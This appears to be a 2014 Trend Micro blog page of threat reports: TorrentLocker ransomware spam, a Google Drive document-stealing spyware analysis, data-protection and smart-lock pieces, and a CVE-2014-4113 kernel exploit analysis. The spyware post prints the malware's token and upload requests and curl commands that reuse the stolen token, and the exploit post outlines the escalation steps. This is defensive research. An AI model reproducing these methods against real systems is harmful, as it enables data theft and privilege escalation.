Trend Micro Facebook TrendLabs Twitter Malware Blog RSS Feed You Tube - Trend Micro
Search our blog:

  • Recent Posts

  • Calendar

    October 2014
    S M T W T F S
    « Sep    
  • About Us

    We recently observed a new ransomware variant, TorrentLocker, that was targeted at nearly 4,000 organizations and enterprises, many of which are located in Italy. TorrentLocker is similar to an earlier ransomware family (CryptoLocker), and also encrypts various files and forces users to pay a sum of money. TorrentLocker uses the TOR anonymity network to hide its network traffic, which may have been the origin of its name.

    The said threat used spam email written in Italian with several templates as part of its social engineering tactics. Translated into English, these messages read:

    1. Your question has been asked on the forum {day}/{month}/{year} {time}. Detailed answer refer to the following address: {malicious link}
    2. He sent a bill that would have paid before {day}/{month}/{year}. Details found: {malicious link}
    3. Your request has been initiated to revise the payment {malicious link}

    Figure 1. Sample spam email

    All the messages contain a link that points to .ZIP file. Decompressing the archive file yields a file disguise as .PDF document. PDF files are commonly passed around within organizations, and as such, employees who received this spammed message may be trick into thinking that it is legitimate.

    Figure 2. Screenshot of the linked archive file

    Some of the archive files have filenames such as,,, or These file names translate to paymenttransactioncompensation, and balance, respectively. However, instead of a PDF file, these files are actually a CryptoLocker variant detected by Trend Micro as TROJ_CRILOCK.YNG.

    Similar to other Cryptolocker variants, it encrypts a wide variety of file types including .DOTX, .DOCX,.DOC, .TXT, .PPT, .PPTX, and .XLSX, among others. All of these file types are associated with Microsoft Office products and are commonly used in enterprises in daily operations.

    In order to receive the decryptor tool to supposedly retrieve crucial files of users, they need to pay the ransom in Bitcoins. One of the samples we found asked for a ransom of 1.375 BTC, which is worth around  $500, a type of digital currency.



    Figures 3 and 4. Screenshots of ransomware (Click to enlarge)

    Italian users are the most affected by this particular spam run, as just over half of all spam messages identified with this spam run were sent to users in Italy. A quarter came from Brazil, with other countries accounting for the remainder. At its peak, several thousand users were affected per day.

    Figure 5. Distribution of TorrentLocker targets globally

    Figure 6. Number of affected targets per day

    We protect our users against this threat by blocking the different facets of this threat. In addition to blocking the various spam messages, we also block the malicious URLs and detect the malicious files used in this attack.

    The hashes of the file seen in this attack include:

    • 050b21190591004cbee3a06019dcb34e766afe47
    • 078838cb99e31913e661657241feeea9c20b965a
    • 6b8ba758c4075e766d2cd928ffb92b2223c644d7
    • 9a24a0c7079c569b5740152205f87ad2213a67ed
    • c58fe7477c0a639e64bcf1a49df79dee58961a34
    • de3c25f2b3577cc192cb33454616d22718d501dc

    Additional information provided by Grant Chen

    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   StumbleUpon  

    Using cloud-based sharing sites is not a new routine for bad guys. Aside from providing free storage for their malicious files, these legitimate sites are used to evade security vendors and researchers.

    We have seen malware that have taken advantage of these sites, such as DropBox, Sendspace, and Evernote. We can now include Google Drive to the list of “abused” sites. We recently came across malware, detected as TSPY_DRIGO.A, that uses Google Drive as one way of siphoning information from its victims.

    Access to Google Drive

    Once executed, the malware will check for the following file types in certain locations to upload them into Google Drive:

    • XLSX
    • XLS
    • DOC
    • DOCX
    • PDF
    • TXT
    • PPT
    • PPTX

    The locations where the malware checks for files include the Recycle Bin and the User Documents folder.

    In order to upload the files to Google Drive, the client_id and client_secret were embedded on the malware, together with a refresh token. Refresh tokens are needed as part of the OAuth 2.0 protocol, which is used by Google Drive. This protocol is used by Twitter, Facebook and other sites to use their accounts to log in to a different website. Access tokens are used to have access on a Google Drive account. However, access tokens expire so refresh tokens are needed to get new access tokens.

    We decrypted communication from the malware and saw activity such as requests for new tokens and uploading files.

    ; request for new token

    POST /o/oauth2/token HTTP/1.1
    User-Agent: Go 1.1 package http
    Content-Length: 208
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip

    client_id={REMOVED} {REMOVED}&grant_type=refresh_token&refresh_token={REMOVED}

    ;reply for new token

    HTTP/1.1 200 OK
    Content-Type: application/json; charset=utf-8
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Fri, 01 Jan 1990 00:00:00 GMT
    Date: Thu, 14 Oct 2014 08:08:32 GMT
    Content-Disposition: attachment; filename=”sample.txt”; filename*=UTF-8”sample.txt
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    X-XSS-Protection: 1; mode=block
    Server: GSE
    Alternate-Protocol: 443:quic
    Transfer-Encoding: chunked

    “access_token” : “{REMOVED}”,
    “token_type” : “Bearer”,
    “expires_in” : 3600

    ;upload file

    POST /upload/drive/v2/files?alt=json&uploadType=multipart HTTP/1.1
    User-Agent: google-api-go-client/0.5
    Content-Length: 398
    Authorization: OAuth {REMOVED}

    Content-Type: multipart/related; boundary=e0cee80c4f3d21e18e77548a60b374408ce65bc3b76c5de1cdbe2afe7eeb
    Accept-Encoding: gzip

    We used this same approach in order to check the files uploaded in the Google Drive account. As of this writing, some of the files are still “active” or present in the account. We’ve also found that the file names reveal the targeted entities, which are mostly government agencies.

    Below is the command line used for testing:

    ;Request new token
    Curl –d “cliend_id={CLIENT_ID}&client_secret={SECRET_KEY}&grant_type=refresh_token&refresh_token={REFRESH_TOKEN}

    ;List files
    Curl –H “Authorization: OAuth {ACCESS_TOKEN}”

    Here’s an excerpt of the log from the Google Drive account on one of the files uploaded:

    “kind”: “drive#file”,
    “title”: “{HOSTNAME} C:\\Users\\{USERNAME}\\AppData\\Roaming\\{REMOVED}長致詞{REMOVED}.doc”,
    “mimeType”: “application/”,
    “createdDate”: “2014-10-16T10:13:14.339Z”,
    “modifiedDate”: “2014-10-16T10:13:16.286Z”,
    “modifiedByMeDate”: “2014-10-16T10:13:16.286Z”,
    “lastViewedByMeDate”: “2014-10-16T10:13:16.286Z”,
    “markedViewedByMeDate”: “1970-01-01T00:00:00.000Z”,

    The Other Google Connection

    Use of Google Drive isn’t the only thing that connects this malware to Google. The malware was actually created using the Go programming language, commonly known as golang. This is an open source programming language that was initially developed by Google. According to Google, “the goals of the Go project were to eliminate the slowness and clumsiness of software development at Google, and thereby to make the process more productive and scalable.”

    While interesting, the use of golang is not new; security researchers have seen golang-created malware as early as 2012. It would be hard to pinpoint the exact reason for using golang but some have attributed its appeal to its supposed lack of mainstream profile.

    Gathering Information

    Our analysis shows that this malware can only upload document-type files to Google Drive. This type of malware routine is perfect for reconnaissance—one of the earlier stages for targeted attacks. After all, one of the key aspects in a successful attack is having enough information on the target. The more information they can gather, the more vector of attack they can use on their target.

    The following hashes are related to this attack:

    • 2C32674B334F10000CB63ED4BA4EE543A16D8572
    • 2D98DDF8F5128853DD33523BCBBD472B8D362705

    Trend Micro secures enterprises via its Custom Defense solution that provides advanced threat protection by performing network-wide monitoring to detect zero-day malware, malicious communications, and attacker behaviors invisible to standard solutions.

    We have already notified Google about this incident.

    With additional insight from Ronnie Giagone, Dove Chiu, and Vico Fang.


    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   StumbleUpon  

    Recent data breaches in big enterprises like large banks and retail chains make one thing clear: data privacy and protection is a concern for all organizations, not just large ones. If  large enterprises with plenty of available resources can be affected by attacks and lose their data, smaller organizations without these resources are at risk as well.

    Users are not just worried about whether their data is secure; today they are also worrying if their data will be used properly by the sites and businesses they deal with. The concern among users about privacy has increased in months and years.

    The statistics bear this all out. A survey carried out in March 2014 by the market research firm GfK highlighted significant, and growing, concerns from consumers about their personal data. 49% of respondents said they were “very much” concerned about how their data was protected, with 60% of respondents saying this concern had increased in the past 12 months.

    Consumers are also taking action. A 2014 study by Radius Global found that 69% of survey respondents would do less business with a company they knew had been breached; 67% would try to only do business with companies that they feel can handle their data. The consequences for companies are clear.

    So, what should companies do? First of all, they need to recognize that data protection is now an important a part of doing business. This means that they must actually approach this as something that is important, and not just a pain that has to be tolerated.

    To do this, organizations should first take stock and remember just what they are protecting and consider what’s most important – i.e., what is their core data. These should be protected with the best available resources. Keep in mind that the levels of protection necessary can change, depending on regulations (like the soon-to-be-implemented data protection regulations in the European Union).

    Local regulations on data protection can vary significantly. In the United States, there are no comprehensive law that covers all sectors. Instead, per-industry legislation such as the Health Insurance Portability and Accountability Act (HIPAA) are in place.

    In other countries, more comprehensive regulations that cover all sectors are more common. For example, countries in the European Union will soon be covered by the EU General Data Protection Regulation, which mandates EU-wide rules on data protection. Japan has similar laws in the form of the Act on the Protection of Personal Information, which dates back to 2003.

    However, not all organizations actually understand these regulations: in the EU, only 13% of businesses called their understanding of the upcoming regulations “very good”.  This is despite the fact that, for example, in the EU businesses can be fined up to 5% of their annual turnover if they are in violation of the proposed regulations.

    Similar approaches need to be taken to assuage concerns about privacy. Ensure that what data is being collected is used correctly and in such a way as not to be perceived as “creepy” by end users. The same data protection that is done for core data must be applied here, too: end users will not take kindly to businesses that don’t protect the data of their customers.

    In the end, data protection comes down not just to technical aspects, but for organizations to decide that it matters. With the new year fast approaching, companies can learn from the many incidents of 2014 and ensure that their own organizations do not fall victim to similar attacks. To know more about data protection law, read our infographic, The Road to Compliance: A Visual Guide to the EU Data Protection Law.

    Trend Micro secures user’s data via its integrated data loss prevention technology that protects data found in endpoints, servers, networks, and even the cloud. It also protects the transfer of data between locations and comes with a central policy management, which does not require installation of different technologies across multiple security layers.

    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   StumbleUpon  

    Security is one of the top concerns when consumers consider buying smart devices. With cybercrime making the headlines every day, one has to think: is this smart device vulnerable to cyber attacks? Are these technologies secure enough for us to rely on them in our everyday lives?

    A good example of a technology that we need to assess for its security and reliability is the smart lock. One of the key characteristics of smart locks is the use of digital door keys, which are used to open them. Digital door keys are typically stored in the vendors cloud servers, along with other properties of the lock. This gives the owner great convenience, since they can “send” the keys to other people remotely in order to allow them temporary access.  It also enables the user to do comprehensive monitoring/reporting, for example, to detect any forced entry, to report any breakage to the lock, to send alerts to the user, etc.

    Smart locks, however, raise certain security risks as well. For instance, attackers may choose to target the vendor’s cloud servers, which may exist anywhere in the world, to get access to key information. Or if the smart lock supports web access, the attacker may attack the portal through code injection, cross-site scripting, etc. They may also launch phishing attacks to be able to get the user’s credentials to the vendor’s web portal used to manage the lock.

    The attackers can also target the communication between the owner’s smart lock and mobile device. Bluetooth Low Energy (BLE) is a popular protocol used for communication between the smart door lock and mobile device or mobile key fob. During the communication process, the digital key is sent from mobile phone to door lock over the air via BLE. The said communication is encrypted, but certain implementations can be subject to man-in-the middle (MITM) attack, as discussed in security community. Since this type of attack requires capturing of packet exchange during device setup, the time window for attack is short which reduces the attack surface significantly. However, it’s up to the vendor to provide a strong BLE security implementation.

    Some brands of smart locks allow user to lock/unlock anywhere in the world.  You can use vendor mobile app, or vendor web portal to check the lock status and lock/unlock it with a click of a finger.  This can be a desired feature for many consumers because of the ease and convenience it offers. The feature, however, does increase the attack surface.  In this case, instead of using BLE, the commands to the smart lock are sent over the Internet to the home router, and then to the lock via home Wi-Fi network, the smart lock device is visible in the local area network. Traditional IP based attacks such as port scanning and remote attack via open ports/firmware vulnerabilities can be used to attack the device.

    The Internet of Everything revolutionizes traditional hardware functionalities. While it creates security challenges, it also provides great opportunities. In the smart lock case, one can implement comprehensive monitoring/reporting, for example, to detect any force entry, broke of lock, send alert to user along with broken lock picture, and attacker picture, etc.  For critical IoE devices (such as door lock in a home), comprehensive monitoring/reporting is important to ensure software and hardware integrity to detect any malicious software/hardware attacks.

    For more detailed discussion on consumer buyer’s guide for smart home devices, you can read our Security Considerations for Consumers Buying Smart Home Devices.

    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   StumbleUpon  

    Three zero-day vulnerabilities - CVE-2014-4114, CVE-2014-4148, and CVE-2014-4113 - were reported last week and patched by Microsoft in their October 2014 Patch Tuesday. CVE-2014-4114, also known as the Sandworm vulnerability, can enable attackers to easily craft malware payloads when exploited.

    This particular vulnerability has been linked to targeted attacks against European sectors and industries. In addition, our researchers found that Sandworm was also being used to target hit SCADA systems.

    The latter two vulnerabilities (CVE-2014-4148, CVE-2014-4113) leveraged vulnerabilities in the Windows kernel (Win32k.sys), affecting most Windows versions. In 2013, only one Windows kernel zero-day, was made public; this particular vulnerability only affected some versions of Windows XP and Windows 2003. These new zero-days could be a sign that attackers are possibly shifting their focus back to kernel vulnerabilities.

    CVE-2014-4113 allows for the elevation of privileges when exploited successfully. Microsoft addressed this in MS14-058. The vulnerability affects both desktop and server versions from Windows XP and Server 2003 up to Windows 8.1 and Server 2012 R2. However, the currently available exploit code does not affect Windows 8 and later versions.

    With a parameter in the command line, the exploit code can create new processes with System privileges of an assigned program. EoP exploits are also believed to be used in targeted attacks, since the exploitable application does not have the privileges needed by attackers. This was seen in Stuxnet which employed CVE-2010-2743 (also in Win32k.sys) to EoP after using other exploit to infect system.

    The analysis of this vulnerability and its exploit will be based on samples with the following MD5 hashes:

    • 70857e02d60c66e27a173f8f292774f1
    • f9f01ce747679b82723b989d01c4d927

    We detect these as TROJ_APOLMY.A and TROJ64_APOLMY.A, with the latter being the version found on 64-bit systems.

    Everything you need to know about the Win32k.sys vulnerability

    Win32k.sys is responsible for window management, and any GUI process/thread that will use it. Its related user-mode modules are user32.dll and GDI32.dll. Due to the complex interaction with user-mode applications, there are many problems in Win32k.sys.

    Let’s take a closer look on the vulnerability being exploited. The essential problem is the function return value is not validated correctly. Programmers tend to overlook this, but doing otherwise is a serious security risk.

    In Win32k.sys, there is a function called xxxMNFindWindowFromPoint(), which returns the address of win32k!tagWND structure or error code -1, -5. Another function xxxHandleMenuMessages() will call it and use its return value as parameter of xxxSendMessage(). Below is the pseudo code:



    tagWnd* pWnd = xxxMNFindWindowFromPoint(…);
    …   //without checking if the return value is a valid address


    Obviously, if the error code -1 or -5 is used in xxxSendMessage() as an address, it will result in an error, such as a blue screen. In user-mode code, this is currently not exploitable. We will  see how the sample exploits this vulnerability in kernel-mode in the next section.

    Below are the key steps or description on how the exploit occurs:

    • Map a prepared memory section to NULL page, which includes a fake win32k!tagWND structure and a pointer to shell code for EoP in that structure.
    • Trigger the bug and make the return value (pWnd) of xxxMNFindWindowFromPoint() to be -5 (0xfffffffb). Because all to-be-checked fields in the fake structure are accessible and in proper values, xxxSendMessage() will treat -5 as a valid address. It will then call a function pointer in the structure, which is the pointer to the shell code.
    • Replace the token in EPROCESS to elevate to SYSTEM privileges in shell code.
    • Create a child process with SYSTEM privileges of the assigned program

    The sample uses SetWindowsHookEx() to control xxxMNFindWindowFromPoint() to return -5:

    1. Create a window and 2-level popup menu.
    2.  Hook that window’s wndproc call.
    3. Track popup menu on the window and enter hook callback.
    4. In the hook callback, it changes wndproc of the menu to another callback.
    5.  In menu’s callback, it will destroy the menu and return -5 (PUSH 0xfffffffb; POP EAX)
    6. Lead to xxxMNFindWindowFromPoint() on the destroyed menu return -5

    Furthermore, the shell code of the sample is simple and direct, as can be seen from the snippet below. We can see that it gets EPROCESS of SYSTEM process (PID=4), and copies its privilege token to EPROCESS of current process.


    Figure 1. Code snippet of the sample

    From the analysis, we can see that it is easier to exploit these kernel vulnerabilities than to exploit vulnerabilities like Internet Explorer UAF vulnerabilities. Some effective protections in user-mode, like DEP, is easily bypassed in kernel-mode exploits. This is because a program, instead of entered data or script, is used to exploit the bug. Such code is by its nature already executable.

    With more application sandboxing adopted in the OS, kernel vulnerabilities will be more important for privilege elevation. Though this exploitation method is not new anymore, it will be noticed by attackers, especially now that CVE-2014-4113 is public.

    During our sample sourcing, we even saw that the source code of an exploit creation tool was exposed. It is expected that more exploits variants will be created by attackers. We believe that threat actors and attackers need kernel vulnerability to carry out EoP attacks and break application sandboxing. Once information about these exploitation methods become more prevalent, we may see more similar kernel zero-day vulnerabilities in the future.

    Windows 7 and Windows XP are the versions of Windows most at risk of this attack. Enterprises are heavy users of both versions, and may be affected by this threat. We highly recommend that users and system administrators apply the relevant patches and keep their systems up-to-date.

    Windows 8 and later versions are at less risk, as the currently available exploit code is blocked on these versions. This is because of a new security feature known as Supervisor Mode Execution Prevention (SMEP), which prevents the access (read/write/execute) of user-mode memory pages in kernel-mode.  As such, the access to null page and shell code will not lead to code execution, although it will lead to crashes.

    Trend Micro is continuously monitoring the threat landscape for any developments regarding these vulnerabilities including Sandworm. For more information on them, you may read our other articles:

    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   StumbleUpon  


    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice